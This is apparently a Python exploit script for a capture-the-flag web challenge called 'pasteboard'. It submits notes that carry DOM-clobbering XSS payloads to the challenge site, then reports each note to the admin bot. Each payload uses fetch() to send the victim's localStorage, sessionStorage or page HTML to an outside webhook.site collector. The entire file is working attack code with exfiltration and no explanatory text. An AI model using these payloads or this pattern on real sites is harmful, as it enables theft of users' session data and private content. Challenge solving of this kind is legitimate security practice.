import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Try multiple data sources
payloads = [
    ("localStorage", '''<form id="errorReporter"><input name="path" value="data:text/javascript,fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/ls?data='+encodeURIComponent(JSON.stringify(localStorage)))"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''),
    
    ("sessionStorage", '''<form id="errorReporter"><input name="path" value="data:text/javascript,fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/ss?data='+encodeURIComponent(JSON.stringify(sessionStorage)))"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''),
    
    ("page HTML", '''<form id="errorReporter"><input name="path" value="data:text/javascript,fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/html?data='+encodeURIComponent(document.body.innerHTML))"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''),
    
    ("document source", '''<form id="errorReporter"><input name="path" value="data:text/javascript,fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/src?data='+encodeURIComponent(document.documentElement.outerHTML.substring(0,2000)))"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''),
]

print("[*] Searching for flag in different locations...")
print()

for name, payload in payloads:
    session = requests.Session()
    resp = session.post(
        f"{BASE_URL}/note/new",
        data={"title": name, "body": payload},
        allow_redirects=False
    )
    
    if resp.status_code == 302:
        location = resp.headers.get('Location')
        note_url = f"{BASE_URL}{location}"
        print(f"[*] {name}: {note_url}")
        
        report = session.post(f"{BASE_URL}/report", data={"url": location})
        if report.status_code == 202:
            print(f"    ✓ Reported")
    print()

print("="*70)
print("[*] Check webhook in 40 seconds for flag in:")
print("    - /ls?data=... (localStorage)")
print("    - /ss?data=... (sessionStorage)")
print("    - /html?data=... (page body)")
print("    - /src?data=... (full HTML)")
print()
print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")